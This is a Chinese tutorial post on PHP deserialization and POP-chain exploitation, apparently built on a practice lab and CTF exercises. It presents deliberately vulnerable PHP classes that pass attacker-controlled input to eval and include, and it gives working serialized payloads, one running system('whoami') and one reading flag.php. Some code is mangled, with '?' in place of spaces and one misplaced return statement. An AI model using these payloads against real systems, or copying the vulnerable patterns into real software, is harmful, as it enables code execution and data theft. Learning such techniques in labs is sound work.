WEB渗透—PHP反序列化(六)

发布时间:2023年12月20日

Web渗透—PHP反序列化????????课程学习分享(课程非本人制作,仅提供学习分享)


靶场下载地址:GitHub - mcc0624/php_ser_Class: php反序列化靶场课程,基于课程制作的靶场

课程地址:PHP反序列化漏洞学习_哔哩哔_bilibili


十、pop链前置知识-成员属性赋值对象

1.反序列化例题

<?php
class?index?{
    private?$test;
    public?function?__construct(){
        $this->test?=?new?normal();
    }
    public?function?__destruct(){         //反序列化unserialize()触发魔术方法destruct()
        $this->test->action();            //destruct()从$test调用action()
    }
}
class?normal?{
    public?function?action(){
        echo?"please?attack?me";
    }
}
class?evil?{
    var?$test2;
    public?function?action(){             //eval()调用$test2
        eval($this->test2);               //可利用漏洞点在函数eval(),(可执行漏洞)
    }
}
unserialize($_GET['test']);
?>

关联点:如何让$test调用evil里面的成员方法action()

解决思路:给$test赋值为对象test = new evil()

2.解题代码

<?php
class?index?{
    private?$test;
    public?function?__construct(){
        $this->test?=?new?evil();        //关联步骤:给$test赋值实例化对象test = new evil()
    }
}
class?evil?{                             //序列化只能序列化成员属性,不能序列化成员方法
    var?$test2 = "system('whoami');";    //构造命令语句
}
$a = new index();                        //实例化对象index(),自动调用__construct()
echo urlencode(serialize($a));
?>

输出结果:

O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D

解题方法:

此时$a为实例化对象index(),其中成员属性$test=new evil(),$test为实例化对象evil(),成员属性$test=”system(‘whoami’);”;

回显结果:


十一、pop链前置知识-魔术方法触发规则

魔术方法触发的前提:魔术方法所在类(或对象)被调用

1.例题代码

(目标:显示toString is here!!

<?php
class?fast?{
    public?$source;
    public?function?__wakeup(){
        echo?"wakeup?is?here!!";
        echo??$this->source;             //3.在echo中的source包含实例化sec()的对象
    }
}
class?sec?{
    var?$benben;
    public?function?__tostring(){        //2.把sec()实例化成对象后当成字符串输出
        echo?"tostring?is?here!!";       //1.需要触发__toString()
    }
}
$b?=?$_GET['benben'];
unserialize($b);
?>

2.解题代码

<?php
class?fast?{
    public?$source;
}
class?sec?{
    var?$benben;
}
$a = new fast();
$b = new sec();
$a -> source = $b;      //将$b当成字符串赋值给source
echo serialize($a);     //在触发wakeup后执行echo从而触发sec里的__toString
?>

在对象$a里让source赋值对象$b,再触发wakeup后执行echo从而触发sec里的toString

输出结果:

O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}

回显结果:


十二、pop链构造和poc编写

1.POP链

在反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在PHP反序列化中有一种漏洞利用方法叫“面向属性编程”,即POP(Property Oriented Programming)。

POP链就是利用魔法方法在里面进行多次跳转然后获得敏感数据的一种payload。

2.POC编写

POC(全称:Proof of concept)中文译做概念验证。在安全界可以理解成漏洞验证程序,POC是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。

编写一段不完整的程序,获取所需要的的序列化字符串。

3.例题代码

<?php
//flag?is?in?flag.php
class?Modifier?{
    private?$var;
    public?function?append($value){
        include($value);
        echo?$flag;                   //1.目标:触发echo输出$flag
    }
    public?function?__invoke(){       //2.触发invoke,调用append,并使$var=flag.php
        $this->append($this->var);    //3.invoke触发条件:把对象当成函数
    }
}
class?Show{
    public?$source;
    public?$str;
    public?function?__toString(){     //7.触发toString(触发条件:把对象当做字符串)
        return?$this->str->source;
                                      //6.给$str赋值为对象Test,而Test中不存在成员属性source,则可触发Test里的成员方法
    }
    public?function?__wakeup(){
        echo?$this->source;           //8.给$source赋值为对象Show,当成字符串被echo调用,触发toString
    }
}
class?Test{
    public?$p;
    public?function?__construct(){
        $this->p?=?array();
    }
    public?function?__get($key){     //5.触发get,(触发条件:调用不存在的成员属性)
        $function?=?$this->p;        //4.给$p赋值为对象,即function成为对象Modifier,却被当成函数调用,触发Modifier中的invoke
    }
    return?$function();
}
if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>

解题思路:

第一步:触发invoke,使$var=flag.php;

第二步:触发get,给$p赋值为对象Modifier

第三步:触发toString,给$str赋值为对象Test

第四步:触发wakeup,给$source赋值为对象Show

4.解题代码

<?php
class?Modifier?{
    private?$var="flag.php";     //根据提示flag在flag.php,将$var赋值为flag.php
}
class?Show{
    public?$source;
    public?$str;
}
class?Test{
    public?$p;
}
$a = new Modifier();             //实例化Modifier为$a
$b = new Show();                 //实例化Show为$b
$c = new Test();                 //实例化Test为$c
$c -> p = $a;
$b -> str = $c;
$b -> source = $b;
echo urlencode(serialize($b));
?>

输出结果:

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D?

回显结果:

获得ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}

文章来源:https://blog.csdn.net/haosha__demingzi/article/details/134561893
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。